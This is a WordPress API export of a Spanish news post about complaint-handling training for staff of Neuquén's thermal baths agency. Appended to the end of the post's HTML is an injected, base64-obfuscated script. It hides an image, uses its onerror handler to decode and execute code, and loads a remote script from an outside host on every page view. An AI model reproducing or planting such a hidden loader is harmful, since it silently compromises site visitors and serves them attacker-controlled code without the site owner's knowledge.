{"id":7656,"date":"2023-11-28T09:02:34","date_gmt":"2023-11-28T12:02:34","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7656"},"modified":"2025-08-13T15:50:14","modified_gmt":"2025-08-13T18:50:14","slug":"neuquen-capacitaron-en-manejo-de-quejas-y-reclamos-en-el-ente-provincial-de-termas","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7656","title":{"rendered":"Neuqu\u00e9n: Capacitaron en Manejo de Quejas y Reclamos en el Ente Provincial de Termas"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-vivid-cyan-blue-background-color has-background\"><em>Estas actividades tienen por objetivo introducir herramientas a fines de contribuir a una mejora continua en la calidad de la atenci\u00f3n al turista.<\/em><\/h3>\n\n\n\n<p>El Ministerio de Turismo de la Provincia llev\u00f3 a cabo el segundo ciclo de capacitaciones en Manejo de Quejas y Reclamos destinado a personal del Ente de Termas de la Provincia. Los talleres se realizaron entre los meses de octubre y noviembre en las sedes Spa Termal Neuqu\u00e9n, CEARART Caviahue, Complejo Termal Copahue y en Loncopu\u00e9 con un total de 222 personas.<\/p>\n\n\n\n<p>Los y las agentes atienden de forma a turistas y recreacionistas que se acercan a disfrutar las bondades del recurso termal.<\/p>\n\n\n\n<p>Desde principio de a\u00f1o se trabaja y se dictan capacitaciones de Atenci\u00f3n a Visitantes en un primer ciclo, y esta segunda parte complementa las herramientas para poder brindar una atenci\u00f3n de calidad.<\/p>\n\n\n\n<p>Estas actividades tiene por objetivo introducir herramientas sobre las tem\u00e1ticas y en comunicaci\u00f3n efectiva, a fines de contribuir a una mejora continua en la calidad de la atenci\u00f3n. De este modo esto apunta a lograr que la experiencia de turistas, cada vez m\u00e1s exigentes, sea \u00f3ptima y deseen volver a nuestra provincia.<\/p>\n\n\n\n<p>Cada uno de los encuentros, tuvieron una parte te\u00f3rica y otra pr\u00e1ctica. Los asistentes pudieron intercambiar opiniones, realizar diferentes tareas y din\u00e1micas pr\u00e1cticas que sirven para plantear situaciones complejas y buscar diferentes alternativas de resoluci\u00f3n.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/Capac-Termas-quejasyreclamos-2023-2.jpg\"><img decoding=\"async\" width=\"1000\" height=\"563\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/Capac-Termas-quejasyreclamos-2023-2.jpg\" alt=\"\" class=\"wp-image-7657\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/Capac-Termas-quejasyreclamos-2023-2.jpg 1000w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/Capac-Termas-quejasyreclamos-2023-2-300x169.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/Capac-Termas-quejasyreclamos-2023-2-768x432.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/Capac-Termas-quejasyreclamos-2023-2-696x392.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/Capac-Termas-quejasyreclamos-2023-2-746x420.jpg 746w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/Capac-Termas-quejasyreclamos-2023-2-320x180.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/Capac-Termas-quejasyreclamos-2023-2-480x270.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/Capac-Termas-quejasyreclamos-2023-2-800x450.jpg 800w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/a><\/figure>\n\n\n\n<p>Los participantes mostraron predisposici\u00f3n e inter\u00e9s en la b\u00fasqueda de soluciones a partir de sus propias experiencias, resignific\u00e1ndolas en funci\u00f3n con la propuesta did\u00e1ctica sugerida.<\/p>\n\n\n\n<p>Las capacitaciones estuvieron a cargo del equipo de la Direcci\u00f3n de Capacitaci\u00f3n Tur\u00edstica de la Direcci\u00f3n Provincial de Desarrollo Tur\u00edstico de la Subsecretar\u00eda de Turismo: Silvina Pad\u00edn, Emilce Ayala y. Andrea del Pilar Vauthay.<\/p>\n\n\n\n<p>En las jornadas tambi\u00e9n participaron el Director General del Spa, Pablo Bonino y la Directora General de Capacitaci\u00f3n de Termas, Ver\u00f3nica Arcos.<\/p>\n\n\n\n<p>Cabe destacar que esta acci\u00f3n se enmarca en el Plan Provincial de Turismo- Lineamientos Estrat\u00e9gicos 2022-2023, establecidos en concordancia con el Plan Estrat\u00e9gico de Desarrollo Tur\u00edstico Sustentable Neuqu\u00e9n 2030, donde se definen ejes de acci\u00f3n vinculados a la Capacitaci\u00f3n y Formaci\u00f3n de los recursos humanos relacionados con la actividad tur\u00edstica, atendiendo de esta forma a la necesidad de fortalecer la calidad en la atenci\u00f3n de los visitantes que recorren la provincia.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"http:\/\/neuquentur.gob.ar\/es\/prensa-turistica\/82814\/capacitaron-en-manejo-de-quejas-y-reclamos-en-el-ente-provincial-de-termas\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"685\" height=\"88\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/Captura-de-pantalla-2023-11-28-090049.jpg\" alt=\"\" class=\"wp-image-7658\" style=\"aspect-ratio:7.784090909090909;width:450px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/Captura-de-pantalla-2023-11-28-090049.jpg 685w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/Captura-de-pantalla-2023-11-28-090049-300x39.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/Captura-de-pantalla-2023-11-28-090049-320x41.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/11\/Captura-de-pantalla-2023-11-28-090049-480x62.jpg 480w\" sizes=\"(max-width: 685px) 100vw, 685px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Estas actividades tienen por objetivo introducir herramientas a fines de contribuir a una mejora continua en la calidad de la atenci\u00f3n al turista. El Ministerio de Turismo de la Provincia llev\u00f3 a cabo el segundo ciclo de capacitaciones en Manejo de Quejas y Reclamos destinado a personal del Ente de Termas de la Provincia. Los [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7659,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29,21],"tags":[],"class_list":["post-7656","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles","category-patagonia"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7656","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7656"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7656\/revisions"}],"predecessor-version":[{"id":10257,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7656\/revisions\/10257"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7659"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7656"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7656"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7656"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}